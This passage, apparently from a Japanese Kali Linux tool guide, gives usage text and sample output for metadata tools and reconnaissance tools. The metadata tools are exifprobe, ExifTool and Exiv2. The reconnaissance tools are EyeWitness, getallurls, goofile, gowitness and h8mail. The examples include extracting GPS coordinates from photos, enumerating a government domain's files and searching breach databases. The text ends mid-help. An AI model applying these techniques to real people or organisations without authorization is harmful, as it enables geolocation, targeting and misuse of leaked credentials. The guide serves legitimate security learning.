GPS Satellites: 06
GPS Img Direction Ref: Unknown ()
GPS Map Datum: WGS-84
GPS Date Stamp: 2008
GPS Date/Time: 2008
GPS Latitude: 43 deg 28´ 2.81″ N
GPS Longitude: 11 deg 53´ 6.46″ E
GPS Position: 43 deg 28´ 2.81″ N, 11 deg 53´ 6.46″ E
EXIF Geolocation Data Not Stripped From Uploaded Images
https://www.openstreetmap.org/?mlat=43.467448&mlon=11.885127&zoom=12
作成されたリンクをブラウザで確認
Exifprobe
画像のファイル構造や補助データ、メタデータを出力します。
■ 使用方法
root@kali:~# exifprobe -h
Usage:
exifprobe [options] filenames(s)
-h - print this help message
-V - print program version and copyright
-R - Report mode: only tagnames and decimal values, indented, inline
-S - Structure mode: everything, offset values not inline (default)
-L - List mode: list all tags and values (only); no structure
-Z - Zero (turn off) all output flags
-a - toggle print addresses in hex and decimal
-D - toggle print enabled addresses, tag numbers and values in decimal only
-X - toggle print enabled addresses, tag numbers and values in hex only
-I - toggle indent (after address -> before -> none)
-i - toggle "inline" print of IFD values
-n - toggle printing of filename at start of each output line
-c - toggle use of color to highlight certain sections
-u - print all 16 bits of unicode data
-p[items] - toggle print identifiers for:
s - sections
g - segments
e - IFD entries
a - expand known entries in APP0...APPN segents
m - print MakerNote scheme detection info
M - debug MakerNote scheme detection info
l - long tagnames (default in List mode)
-e[items] - toggle print IFD entry items:
t - tagname
n - tag number in decimal
N - tag number in hex
T - entry type
v - value in decimal
V - value in hex
o - file offset to value in decimal
O - file offset to value in hex
r - relative (unadjusted) offset in decimal
R - print "raw" values where expansion of values is needed
a - print ascii strings until null, rather than by length
A - print ALL elements of multiple-value tags
-M[len|a] - hex/ascii dump 'len' (or all) bytes of unknown MakerNotes
-A[len|a] - hex/ascii dump 'len' (or all) bytes of unknown APPn segments
-U[len|a] - hex/ascii dump 'len' (or all) bytes of UNDEFINED data of unknown format
-B[len|a] - hex/ascii dump 'len' (or all) bytes of binary images or invalid JPEG data
-N[num] - force noteversion 'num' for MakerNote interpretation
-m[name] - force use of maker 'name' to select MakerNote interpretation routines
-l[model] - force use of 'model' to select MakerNote interpretation routines
-O[offset] - start processing at 'offset' in file
-C[make]+[model] - print makes matching 'make', models matching 'model' (substrings)
■ 使用例
# 使用画像:https://github.com/ianare/exif-samples
root@kali:~# exifprobe DSCN0010.jpg
File Name = DSCN0010.jpg
File Type = JPEG
File Size = 161713
@000000000=0 : <JPEG_SOI>
@0x0000002=2 : <JPEG_APP1> 0xffe1 length 11258, 'Exif'
@0x000000c=12 : TIFF(II=0x4949) magic=0x002a='*\0' ifd offset = 8 (+ 12 = 0x14/20)
@0x0000014=20 : <IFD 0> 12 entries starting at file offset 0x16=22
@0x0000016=22 : <0x010e= 270> ImageDescription [2 =ASCII 32] = @0xaa=170
@0x0000022=34 : <0x010f= 271> Make [2 =ASCII 6] = @0xca=202
[...]
@0x00000a6=166 : **** next IFD offset 4454(+ 12 = 0x1172/4466)
@0x00000aa=170 : ============= VALUES, IFD 0 ============
@0x00000aa=170 : ImageDescription = ' \0'
@0x00000ca=202 : Make = 'NIKON\0'
@0x00000d0=208 : Model = 'COOLPIX P6000\0'
@0x00000de=222 : XResolution = 300
@0x00000e6=230 : YResolution = 300
@0x00000ee=238 : Software = 'Nikon Transfer 1.1 W\0'
@0x0000104=260 : DateTime = '2008:11:01 21:15:07\0'
@0x0000118=280 : <EXIF IFD> (in IFD 0) 34 entries starting at file offset 0x11a=282
@0x000011a=282 : <0x829a=33434> ExposureTime [5 =RATIONAL 1] = @0x2b6=694
@0x0000126=294 : <0x829d=33437> FNumber [5 =RATIONAL 1] = @0x2be=702
[...]
@0x00002b2=690 : **** next IFD offset 0
@0x00002b6=694 : ============= VALUES, EXIF IFD ============
@0x00002b6=694 : ExposureTime = 0.0133333 sec
@0x00002be=702 : FNumber = 5.9 APEX = 'f7.7'
@0x00002c6=710 : DateTimeOriginal = '2008:10:22 16:28:39\0'
@0x00002da=730 : DateTimeDigitized = '2008:10:22 16:28:39\0'
@0x00002ee=750 : ExposureBiasValue = 0 APEX
@0x00002f6=758 : MaxApertureValue = 2.9 APEX = 'f2.7'
@0x00002fe=766 : FocalLength = 24 mm
[...]
-0x000116b=4459 : </EXIF IFD>
@0x00003aa=938 : <GPS IFD> (in IFD 0) 10 entries starting at file offset 0x3ac=940
@0x00003ac=940 : <0x0001= 1> LatitudeRef [2 =ASCII 2] = 'N'
@0x00003b8=952 : <0x0002= 2> Latitude [5 =RATIONAL 3] = @0x428=1064
[...]
@0x0000424=1060 : **** next IFD offset 0
@0x0000428=1064 : ============= VALUES, GPS IFD ============
@0x0000428=1064 : Latitude = 43,28,2.814
@0x0000440=1088 : Longitude = 11,53,6.456
@0x0000458=1112 : TimeStamp = 14,27,7.24
@0x0000470=1136 : MapDatum = 'WGS-84 \0'
@0x000047a=1146 : DateStamp = '2008:10:23\0'
-0x0000484=1156 : </GPS IFD>
@0x000116b=4459 : </IFD 0>
@0x0001172=4466 : <IFD 1> 6 entries starting at file offset 0x1174=4468
@0x0001174=4468 : <0x0103= 259> Compression [3 =SHORT 1] = 6 = 'Exif/old JPEG'
@0x0001180=4480 : <0x011a= 282> XResolution [5 =RATIONAL 1] = @0x11c0=4544
[...]
@0x0002bfd=11261 : </IFD 1>
-0x0002bfd=11261 : </JPEG_APP1>
@0x0002bfe=11262 : <JPEG_DQT> length 197
@0x0002cc5=11461 : <JPEG_DHT> length 418 table class = 0 table id = 0
@0x0002e69=11881 : <JPEG_SOF_0> length 17, 8 bits/sample, components=3, width=640, height=480
@0x0002e7c=11900 : <JPEG_APP1> 0xffe1 length 4031, 'http://ns.adobe.com/xap/1.0/' - unknown format - (not dumped: use -A)
-0x0003e3c=15932 : </JPEG_APP1>
@0x0003e3d=15933 : <JPEG_SOS> length 12 start of JPEG data, 3 components 307200 pixels
@0x00277af=161711 : <JPEG_EOI> JPEG length 161713
-0x00277b0=161712 : END OF FILE
@000000000=0 : Start of JPEG baseline DCT compressed primary image [640x480] length 161713
-0x00277b0=161712 : End of JPEG primary image data
@0x00011d0=4560 : Start of JPEG baseline DCT compressed reduced-resolution image [160x120] length 6702 (IFD 1)
-0x0002bfd=11261 : End of JPEG reduced-resolution image data
Number of images = 2
File Format = JPEG/APP1/TIFF/EXIF # with MakerNote (Nikon Corporation [2])
ExifTool
様々なファイルのメタ情報の読み書きを行います。
■ 使用方法
root@kali:~# man exiftool
SYNOPSIS
Reading
exiftool [OPTIONS] [-TAG...] [--TAG...] FILE...
Writing
exiftool [OPTIONS] -TAG[+-<]=[VALUE]... FILE...
Copying
exiftool [OPTIONS] -tagsFromFile SRCFILE [-[DSTTAG<]SRCTAG...] FILE...
Other
exiftool [ -ver | -list[w|f|r|wf|g[NUM]|d|x] ]
For specific examples, see the EXAMPLES sections below.
OPTIONS
Option Overview
Tag operations
-TAG or --TAG Extract or exclude specified tag
-TAG[+-^]=[VALUE] Write new value for tag
-TAG[+-]<=DATFILE Write tag value from contents of file
-[+]TAG[+-]<SRCTAG Copy tag value (see -tagsFromFile)
-tagsFromFile SRCFILE Copy tag values from file
-x TAG (-exclude) Exclude specified tag
Input-output text formatting
-args (-argFormat) Format metadata as exiftool arguments
-b (-binary) Output metadata in binary format
-c FMT (-coordFormat) Set format for GPS coordinates
-charset [[TYPE=]CHARSET] Specify encoding for special characters
-csv[[+]=CSVFILE] Export/import tags in CSV format
-csvDelim STR Set delimiter for CSV file
-d FMT (-dateFormat) Set format for date/time values
-D (-decimal) Show tag ID numbers in decimal
-E,-ex,-ec (-escape(HTML|XML|C))Escape tag values for HTML, XML or C
-f (-forcePrint) Force printing of all specified tags
-g[NUM...] (-groupHeadings) Organize output by tag group
-G[NUM...] (-groupNames) Print group name for each tag
-h (-htmlFormat) Use HTML formatting for output
-H (-hex) Show tag ID numbers in hexadecimal
-htmlDump[OFFSET] Generate HTML-format binary dump
-j[[+]=JSONFILE] (-json) Export/import tags in JSON format
-l (-long) Use long 2-line output format
-L (-latin) Use Windows Latin1 encoding
-lang [LANG] Set current language
-listItem INDEX Extract specific item from a list
-n (--printConv) No print conversion
-p[-] STR (-printFormat) Print output in specified format
-php Export tags as a PHP Array
-s[NUM] (-short) Short output format (-s for tag names)
-S (-veryShort) Very short output format
-sep STR (-separator) Set separator string for list items
-sort Sort output alphabetically
-struct Enable output of structured information
-t (-tab) Output in tab-delimited list format
-T (-table) Output in tabular format
-v[NUM] (-verbose) Print verbose messages
-w[+|!] EXT (-textOut) Write (or overwrite!) output text files
-W[+|!] FMT (-tagOut) Write output text file for each tag
-Wext EXT (-tagOutExt) Write only specified file types with -W
-X (-xmlFormat) Use RDF/XML output format
Processing control
-a (-duplicates) Allow duplicate tags to be extracted
-e (--composite) Do not generate composite tags
-ee[NUM] (-extractEmbedded) Extract information from embedded files
-ext[+] EXT (-extension) Process files with specified extension
-F[OFFSET] (-fixBase) Fix the base for maker notes offsets
-fast[NUM] Increase speed when extracting metadata
-fileOrder[NUM] [-]TAG Set file processing order
-i DIR (-ignore) Ignore specified directory name
-if[NUM] EXPR Conditionally process files
-m (-ignoreMinorErrors) Ignore minor errors and warnings
-o OUTFILE (-out) Set output file or directory name
-overwrite_original Overwrite original by renaming tmp file
-overwrite_original_in_place Overwrite original by copying tmp file
-P (-preserve) Preserve file modification date/time
-password PASSWD Password for processing protected files
-progress[NUM][:[TITLE]] Show file progress count
-q (-quiet) Quiet processing
-r[.] (-recurse) Recursively process subdirectories
-scanForXMP Brute force XMP scan
-u (-unknown) Extract unknown tags
-U (-unknown2) Extract unknown binary tags too
-wm MODE (-writeMode) Set mode for writing/creating tags
-z (-zip) Read/write compressed information
Other options
-@ ARGFILE Read command-line arguments from file
-k (-pause) Pause before terminating
-list[w|f|wf|g[NUM]|d|x] List various exiftool capabilities
-ver Print exiftool version number
-- End of options
Special features
-geotag TRKFILE Geotag images from specified GPS log
-globalTimeShift SHIFT Shift all formatted date/time values
-use MODULE Add features from plug-in module
Utilities
-delete_original[!] Delete "_original" backups
-restore_original Restore from "_original" backups
Advanced options
-api OPT[[^]=[VAL]] Set ExifTool API option
-common_args Define common arguments
-config CFGFILE Specify configuration file name
-echo[NUM] TEXT Echo text to stdout or stderr
-efile[NUM][!] ERRFILE Save names of files with errors
-execute[NUM] Execute multiple commands on one line
-fileNUM ALTFILE Load tags from alternate file
-list_dir List directories, not their contents
-srcfile FMT Process a different source file
-stay_open FLAG Keep reading -@ argfile even after EOF
-userParam PARAM[[^]=[VAL]] Set user parameter (API UserParam opt)
■ 使用例
root@kali:~# exiftool example.jpg
File Size : 162 kB
File Type : JPEG
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
Image Description :
Make : NIKON
Camera Model Name : COOLPIX P6000
Orientation : Horizontal (normal)
X Resolution : 300
Y Resolution : 300
Resolution Unit : inches
Software : Nikon Transfer 1.1 W
[...]
root@kali:~# exiftool example.mp3
File Size : 49 kB
File Type : MP3
MIME Type : audio/mpeg
MPEG Audio Version : 1
Audio Layer : 3
Audio Bitrate : 64 kbps
Sample Rate : 48000
Channel Mode : Stereo
[...]
root@kali:~# exiftool example.docx
File Size : 4.1 kB
File Type : DOCX
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0808
Zip Compression : Deflated
Zip Modify Date : 2016:10:07 13:21:00
[...]
root@kali:~# exiftool example.epub
File Size : 4.1 MB
File Type : EPUB
MIME Type : application/epub+zip
Identifier Id : pub-identifier
Identifier : urn:isbn:9781449328030
Title Id : pub-title
Title : Accessible EPUB 3
[...]
Exiv2
画像のメタデータの読み書き、削除、編集を行います。
■ 使用方法
root@kali:~# exiv2 -h
Usage: exiv2 [ option [ arg ] ]+ [ action ] file ...
Where file is one or more files, optionally containing a URL
(http, https, ftp, sftp, data or file) or wildcard
Actions:
pr | print Print image metadata (default is a summary). This is the default
action
ad | adjust Adjust Exif timestamps by the given time. Requires
at least one of -a, -Y, -O or -D
rm | delete Deletes image metadata, use -d to choose type to delete
(default is all)
in | insert Insert metadata from .exv, .xmp, thumbnail or .icc file.
Use option -S to change the suffix of the input files and
-l to change the location
ex | extract Extract metadata to .exv, .xmp, preview image, thumbnail,
or ICC profile. Use option -S to change the suffix of the input
files and -l to change the location
mv | rename Rename files and/or set file timestamps according to the
Exif timestamps. The filename format can be set with
-r format, timestamp options are controlled with -t and -T
mo | modify Apply commands to modify the Exif, IPTC and XMP metadata.
Requires option -m or -M
fi | fixiso Copy ISO setting from Canon and Nikon makernotes, to the
standard Exif tag
fc | fixcom Convert the Unicode Exif user comment to UCS-2. The current
character encoding can be specified with the -n option
Options:
-h Display this help and exit
-V Show the program version and exit
-v Be verbose during the program run
-q Silence warnings and error messages (quiet)
-Q lvl Set log-level to d(ebug), i(nfo), w(arning), e(rror) or m(ute)
-b Obsolete, reserved for use with the test suit
-u Show unknown tags (e.g., Exif.SonyMisc3c.0x022b)
-g str Only output where 'str' matches in output text (grep)
Append /i to 'str' for case insensitive
-K key Only output where 'key' exactly matches tag\'s key
-n enc Character set to decode Exif Unicode user comments
-k Preserve file timestamps when updating files (keep)
-t Set the file timestamp from Exif metadata when renaming (overrides -k)
-T Only set the file timestamp from Exif metadata ('rename' action)
-f Do not prompt before overwriting existing files (force)
-F Do not prompt before renaming files (Force)
-a time Time adjustment in the format [+|-]HH[:MM[:SS]]. For 'adjust' action
-Y yrs Year adjustment with the 'adjust' action
-O mon Month adjustment with the 'adjust' action
-D day Day adjustment with the 'adjust' action
-p mode Print mode for the 'print' action. Possible modes are:
s : A summary of the Exif metadata (the default)
a : Exif, IPTC and XMP tags (shortcut for -Pkyct)
e : Exif tags (shortcut for -PEkycv)
t : Interpreted (translated) Exif tags (-PEkyct)
v : Plain (untranslated) Exif tags values (-PExgnycv)
h : Hex dump of the Exif tags (-PExgnycsh)
i : IPTC tags (-PIkyct)
x : XMP tags (-PXkyct)
c : JPEG comment
p : List available image preview, sorted by size
C : Print ICC profile
R : Recursive print structure of image (debug build only)
S : Print structure of image (limited file types)
X : Extract "raw" XMP
-P flgs Print flags for fine control of tag lists ('print' action):
E : Exif tags
I : IPTC tags
X : XMP tags
x : Tag number for Exif or IPTC tags (in hexadecimal)
g : Group name (e.g. Exif.Photo.UserComment, Photo)
k : Key (e.g. Exif.Photo.UserComment)
l : Tag label (e.g. Exif.Photo.UserComment, 'User comment')
d : Tag description
n : Tag name (e.g. Exif.Photo.UserComment, UserComment)
y : Type
y : Type
c : Number of components (count)
s : Size in bytes of vanilla value (may include NULL)
v : Plain data value of untranslated (vanilla)
V : Plain data value, data type and the word 'set'
t : Interpreted (translated) human readable values
h : Hex dump of the data
-d tgt1 Delete target(s) for the 'delete' action. Possible targets are:
a : All supported metadata (the default)
e : Exif tags
t : Exif thumbnail only
i : IPTC tags
x : XMP tags
c : JPEG comment
C : ICC Profile
c : All IPTC data (any broken multiple IPTC blocks)
- : Input from stdin
-i tgt2 Insert target(s) for the 'insert' action. Possible targets are
a : All supported metadata (the default)
e : Exif tags
t : Exif thumbnail only (JPEGs only from <file>-thumb.jpg)
i : IPTC tags
x : XMP tags
c : JPEG comment
C : ICC Profile, from <file>.icc
X : XMP sidecar from file <file>.xmp
XX: "raw" metadata from <file>.exv. XMP default, optional Exif and IPTC
- : Input from stdin
-e tgt3 Extract target(s) for the 'extract' action. Possible targets
a : All supported metadata (the default)
e : Exif tags
t : Exif thumbnail only (to <file>-thumb.jpg)
i : IPTC tags
x : XMP tags
c : JPEG comment
pN: Extract N\'th preview image to <file>-preview<N>.<ext>
C : ICC Profile, to <file>.icc
X : XMP sidecar to <file>.xmp
XX: "raw" metadata to <file>.exv. XMP default, optional Exif and IPTC
- : Output to stdin
-r fmt Filename format for the 'rename' action. The format string
follows strftime(3). The following keywords are also supported:
:basename: - original filename without extension
:dirname: - name of the directory holding the original file
:parentname: - name of parent directory
Default 'fmt' is %Y%m%d_%H%M%S
-c txt JPEG comment string to set in the image.
-m cmdf Applies commands in 'cmdf' file, for the modify action (see -M for format).
-M cmd Command line for the modify action. The format is:
( (set | add) <key> [[<type>] <value>] |
del <key> [<type>] |
reg prefix namespace )
-l dir Location (directory) for files to be inserted from or extracted to.
-S suf Use suffix 'suf' for source files for insert action.
Examples:
exiv2 -pe image.dng *.jp2
Print all Exif tags in image.dng and all .jp2 files
exiv2 -g date/i https://clanmills.com/Stonehenge.jpg
Print all tags in file, where key contains 'date' (case insensitive)
exiv2 -M"set Xmp.dc.subject XmpBag Sky" image.tiff
Set (or add if missing) value to tag in file
■ 使用例
# 使用画像:https://github.com/ianare/exif-samples
# Exif情報を全て表示
root@kali:~# exiv2 -pe DSCN0010.jpg
Exif.Image.ImageDescription Ascii 32
Exif.Image.Make Ascii 6 NIKON
Exif.Image.Model Ascii 14 COOLPIX P6000
Exif.Image.Orientation Short 1 1
Exif.Image.XResolution Rational 1 300/1
Exif.Image.YResolution Rational 1 300/1
[...]
# タグ名に"date"が含まれるものを表示
root@kali:~# exiv2 -g date/i DSCN0010.jpg
Exif.Image.DateTime Ascii 20 2008:11:01 21:15:07
Exif.Photo.DateTimeOriginal Ascii 20 2008:10:22 16:28:39
Exif.Photo.DateTimeDigitized Ascii 20 2008:10:22 16:28:39
Exif.GPSInfo.GPSDateStamp Ascii 11 2008:10:23
# Exif.Image.DateTimeを編集
root@kali:~# exiv2 -M "set Exif.Image.DateTime 2024:01:01 09:00:00" DSCN0010.jpg
root@kali:~# exiv2 -g date/i DSCN0010.jpg
Exif.Image.DateTime Ascii 20 2024:01:01 09:00:00
Exif.Photo.DateTimeOriginal Ascii 20 2008:10:22 16:28:39
Exif.Photo.DateTimeDigitized Ascii 20 2008:10:22 16:28:39
Exif.GPSInfo.GPSDateStamp Ascii 11 2008:10:23
EyeWitness
指定されたURLのスクリーンショットを取得します。
■ 使用方法
root@kali:~# eyewitness --help
usage: EyeWitness.py [--web] [-f Filename] [-x Filename.xml] [--single Single URL] [--no-dns] [--timeout Timeout] [--jitter # of Seconds] [--delay # of Seconds]
[--threads # of Threads] [--max-retries Max retries on a timeout] [-d Directory Name] [--results Hosts Per Page] [--no-prompt]
[--user-agent User Agent] [--difference Difference Threshold] [--proxy-ip 127.0.0.1] [--proxy-port 8080] [--proxy-type socks5]
[--show-selenium] [--resolve] [--add-http-ports ADD_HTTP_PORTS] [--add-https-ports ADD_HTTPS_PORTS] [--only-ports ONLY_PORTS]
[--prepend-https] [--selenium-log-path SELENIUM_LOG_PATH] [--cookies key1=value1,key2=value2] [--resume ew.db]
Protocols:
--web HTTP Screenshot using Selenium
Input Options:
-f Filename Line-separated file containing URLs to capture
-x Filename.xml Nmap XML or .Nessus file
--single Single URL Single URL/Host to capture
--no-dns Skip DNS resolution when connecting to websites
Timing Options:
--timeout Timeout Maximum number of seconds to wait while requesting a web page (Default: 7)
--jitter # of Seconds
Randomize URLs and add a random delay between requests
--delay # of Seconds Delay between the opening of the navigator and taking the screenshot
--threads # of Threads
Number of threads to use while using file based input
--max-retries Max retries on a timeout
Max retries on timeouts
Report Output Options:
-d Directory Name Directory name for report output
--results Hosts Per Page
Number of Hosts per page of report
--no-prompt Don\'t prompt to open the report
Web Options:
--user-agent User Agent
User Agent to use for all requests
--difference Difference Threshold
Difference threshold when determining if user agent requests are close "enough" (Default: 50)
--proxy-ip 127.0.0.1 IP of web proxy to go through
--proxy-port 8080 Port of web proxy to go through
--proxy-type socks5 Proxy type (socks5/http)
--show-selenium Show display for selenium
--resolve Resolve IP/Hostname for targets
--add-http-ports ADD_HTTP_PORTS
Comma-separated additional port(s) to assume are http (e.g. '8018,8028')
--add-https-ports ADD_HTTPS_PORTS
Comma-separated additional port(s) to assume are https (e.g. '8018,8028')
--only-ports ONLY_PORTS
Comma-separated list of exclusive ports to use (e.g. '80,8080')
--prepend-https Prepend http:// and https:// to URLs without either
--selenium-log-path SELENIUM_LOG_PATH
Selenium geckodriver log path
--cookies key1=value1,key2=value2
Additional cookies to add to the request
Resume Options:
--resume ew.db Path to db file if you want to resume
■ 使用例
root@kali:~# eyewitness --web --single http://192.168.11.4
[*] Done! Report written in the /root/2024-10-03_065851 folder!
[...]
取得したスクリーンショット
getallurls
指定されたドメインのURLをAlienVault Open Threat Exchange、Wayback Machine、Common Crawlを使用して収集します。
■ 使用方法
root@kali:~# getallurls --help
Usage of getallurls:
-json
write output as json
-o string
filename to write results to
-p string
HTTP proxy to use
-providers string
providers to fetch urls for (default "wayback,otx,commoncrawl")
-random-agent
use random user-agent
-retries uint
amount of retries for http client (default 5)
-subs
include subdomains of target domain
-v enable verbose mode
-version
show gau version
■ 使用例
root@kali:~# getallurls ipa.go.jp | grep -e .*\.pdf$
https://www.ipa.go.jp/about/disclosure/ps6vr7000001thja-att/2024070101.pdf
https://www.ipa.go.jp/about/ipajoho/pdf/seifushussi.pdf
https://www.ipa.go.jp/about/ipanews/eid2eo0000002xfg-att/eid2eo0000002xg0.pdf
https://www.ipa.go.jp/about/ipanews/m42obm000000iv4x-att/security5kajou.pdf
https://www.ipa.go.jp/about/press/pdf/090106Press.pdf
https://www.ipa.go.jp/about/press/pdf/101202press_bessi.pdf
https://www.ipa.go.jp/about/press/pdf/120424_2press.pdf
https://www.ipa.go.jp/about/press/pdf/120424_2press2.pdf
[...]
goofile
Google検索を利用して指定したドメインのインデックスされているファイルを検索します。
■ 使用方法
root@kali:~# goofile --help
usage: goofile [-h] [-d DOMAIN] [-f FILETYPE] [-k KEY] [-e ENGINE] [-q QUERY] [--logging LOGGING]
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
the domain to search - optional (ie. kali.org
-f FILETYPE, --filetype FILETYPE
the filetype to search for - required (ie. pdf)
-k KEY, --key KEY Google Custom Search Engine API key - optional
-e ENGINE, --engine ENGINE
Google Custom Search Engine ID - optional
-q QUERY, --query QUERY
Only search for files with keyword - optional
--logging LOGGING Set the logging verbosity to something other than "INFO" - optional
■ 使用例
root@kali:~# goofile -d ipa.go.jp -f pdf
Searching in ipa.go.jp for pdf
========================================
Files found:
====================
www.ipa.go.jp/archive/files/000063744.pdf
www.ipa.go.jp/archive/files/000052571.pdf
www.ipa.go.jp/archive/files/000066605.pdf
www.ipa.go.jp/archive/files/000063749.pdf
www.ipa.go.jp/archive/files/000066533.pdf
www.ipa.go.jp/archive/files/000004608.pdf
www.ipa.go.jp/archive/files/000072042.pdf
www.ipa.go.jp/archive/files/000072724.pdf
[...]
# Programmable Search Engineを使用
root@kali:~# goofile -d ipa.go.jp -f pdf -k <APIキー> -e <検索エンジンID> -q "一般競争入札"
Searching in ipa.go.jp for pdf
========================================
Files found:
====================
https://www.ipa.go.jp/archive/files/000083842.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/eid2eo00000058ca-att/nyusatsu20240701-2qa.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm000000igqh-att/nyusatsu20240604.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm0000009dy6-att/nyusatsu20240416ga.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm000000iuc2-att/nyusatsu20240607qa.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm000000520e-att/nyusatsu20240404-9qa.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm0000004y1e-att/nyusatsu20240404-5qa.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/f55m8k000000977e-att/nyusatsu20240829-2ga.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/eid2eo0000005v1q-att/nyusatsu20240704qa-2.pdf
[...]
gowitness
指定されたURLのスクリーンショットを取得します。
■ 使用方法
root@kali:~# gowitness --help
Usage:
gowitness [command]
Available Commands:
help Help about any command
report Work with gowitness reports
scan Perform various scans
version Get the gowitness version
Flags:
-D, --debug-log Enable debug logging
-h, --help help for gowitness
-q, --quiet Silence (almost all) logging
root@kali:~# gowitness scan --help
Usage:
gowitness scan [command]
Available Commands:
cidr Scan CIDR targets on a network
file Scan targets sourced from a file or stdin
nessus Scan targets from a Nessus XML file
nmap Scan targets from an Nmap XML file
single Scan a single URL target
Flags:
--chrome-header strings Extra headers to add to requests. Supports multiple --header flags
--chrome-path string The path to a Google Chrome binary to use (downloads a platform-appropriate binary by default)
--chrome-proxy string An HTTP/SOCKS5 proxy server to use. Specify the proxy using this format: proto://address:port
--chrome-user-agent string The user-agent string to use (default "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36")
--chrome-window-x int The Chrome browser window width, in pixels (default 1920)
--chrome-window-y int The Chrome browser window height, in pixels (default 1080)
--chrome-wss-url string A websocket URL to connect to a remote, already running Chrome DevTools instance (i.e., Chrome started with --remote-debugging-port)
--delay int Number of seconds delay between navigation and screenshotting (default 3)
--driver string The scan driver to use. Can be one of [gorod, chromedp] (default "chromedp")
-h, --help help for scan
--javascript string A JavaScript function to evaluate on every page, before a screenshot. Note: It must be a JavaScript function! e.g., () => console.log('gowitness');
--javascript-file string A file containing a JavaScript function to evaluate on every page, before a screenshot. See --javascript
--log-scan-errors Log scan errors (timeouts, DNS errors, etc.) to stderr (warning: can be verbose!)
--save-content Save content from network requests to the configured writers. WARNING: This flag has the potential to make your storage explode in size
--screenshot-format string Format to save screenshots as. Valid formats are: jpeg, png (default "jpeg")
--screenshot-fullpage Do full-page screenshots, instead of just the viewport
-s, --screenshot-path string Path to store screenshots (default "./screenshots")
--screenshot-skip-save Do not save screenshots to the screenshot-path (useful together with --write-screenshots)
--skip-html Don\'t include the first request\'s HTML response when writing results
-t, --threads int Number of concurrent threads (goroutines) to use (default 6)
-T, --timeout int Number of seconds before considering a page timed out (default 60)
--uri-filter strings Valid URIs to pass to the scanning process (default [http,https])
--write-csv Write results as CSV (has limited columns)
--write-csv-file string The file to write CSV rows to (default "gowitness.csv")
--write-db Write results to a SQLite database
--write-db-enable-debug Enable database query debug logging (warning: verbose!)
--write-db-uri string The database URI to use. Supports SQLite, Postgres, and MySQL (e.g., postgres://user:pass@host:port/db) (default "sqlite://gowitness.sqlite3")
--write-jsonl Write results as JSON lines
--write-jsonl-file string The file to write JSON lines to (default "gowitness.jsonl")
--write-screenshots Store screenshots with writers in addition to filesystem storage
--write-stdout Write successful results to stdout (usefull in a shell pipeline)
Global Flags:
-D, --debug-log Enable debug logging
-q, --quiet Silence (almost all) logging
■ 使用例
root@kali:~# gowitness scan single --url http://192.168.11.4 --screenshot-format png
2024/10/10 11:50:34 WARN no writers have been configured. to persist probe results, add writers using --write-* flags
2024/10/10 11:50:43 INFO result 🤖 target=http://192.168.11.4 status-code=200 title=EC-CUBE SHOP / TOPページ have-screenshot=true
出力結果
h8mail
下記のデータ侵害データベース/サービスを横断検索してデータ侵害の有無をチェックします。
- HaveIBeenPwned
- Hunter.io
- Snusbase
- Leak-Lookup
- Emailrep.io
- Dehashed.com
- IntelX.io
■ 使用方法
root@kali:~# h8mail --help
usage: h8mail [-h] [-t USER_TARGETS [USER_TARGETS ...]] [-u USER_URLS [USER_URLS ...]] [-q USER_QUERY] [--loose]
[-c CONFIG_FILE [CONFIG_FILE ...]] [-o OUTPUT_FILE] [-j OUTPUT_JSON] [-bc BC_PATH] [-sk] [-k CLI_APIKEYS [CLI_APIKEYS ...]]
[-lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...]] [-gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...]] [-sf] [-ch [CHASE_LIMIT]]
[--power-chase] [--hide] [--debug] [--gen-config]
options:
-h, --help show this help message and exit
-t USER_TARGETS [USER_TARGETS ...], --targets USER_TARGETS [USER_TARGETS ...]
Either string inputs or files. Supports email pattern matching from input or file, filepath globing and multiple
arguments
-u USER_URLS [USER_URLS ...], --url USER_URLS [USER_URLS ...]
Either string inputs or files. Supports URL pattern matching from input or file, filepath globing and multiple
arguments. Parse URLs page for emails. Requires http:// or https:// in URL.
-q USER_QUERY, --custom-query USER_QUERY
Perform a custom query. Supports username, password, ip, hash, domain. Performs an implicit "loose" search when
searching locally
--loose Allow loose search by disabling email pattern recognition. Use spaces as pattern seperators
-c CONFIG_FILE [CONFIG_FILE ...], --config CONFIG_FILE [CONFIG_FILE ...]
Configuration file for API keys. Accepts keys from Snusbase, WeLeakInfo, Leak-Lookup, HaveIBeenPwned, Emailrep,
Dehashed and hunterio
-o OUTPUT_FILE, --output OUTPUT_FILE
File to write CSV output
-j OUTPUT_JSON, --json OUTPUT_JSON
File to write JSON output
-bc BC_PATH, --breachcomp BC_PATH
Path to the breachcompilation torrent folder. Uses the query.sh script included in the torrent
-sk, --skip-defaults Skips Scylla and HunterIO check. Ideal for local scans
-k CLI_APIKEYS [CLI_APIKEYS ...], --apikey CLI_APIKEYS [CLI_APIKEYS ...]
Pass config options. Supported format: "K=V,K=V"
-lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...], --local-breach LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...]
Local cleartext breaches to scan for targets. Uses multiprocesses, one separate process per file, on separate worker
pool by arguments. Supports file or folder as input, and filepath globing
-gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...], --gzip LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...]
Local tar.gz (gzip) compressed breaches to scans for targets. Uses multiprocesses, one separate process per file.
Supports file or folder as input, and filepath globing. Looks for 'gz' in filename
-sf, --single-file If breach contains big cleartext or tar.gz files, set this flag to view the progress bar. Disables concurrent file
searching for stability
-ch [CHASE_LIMIT], --chase [CHASE_LIMIT]
Add related emails from hunter.io to ongoing target list. Define number of emails per target to chase. Requires
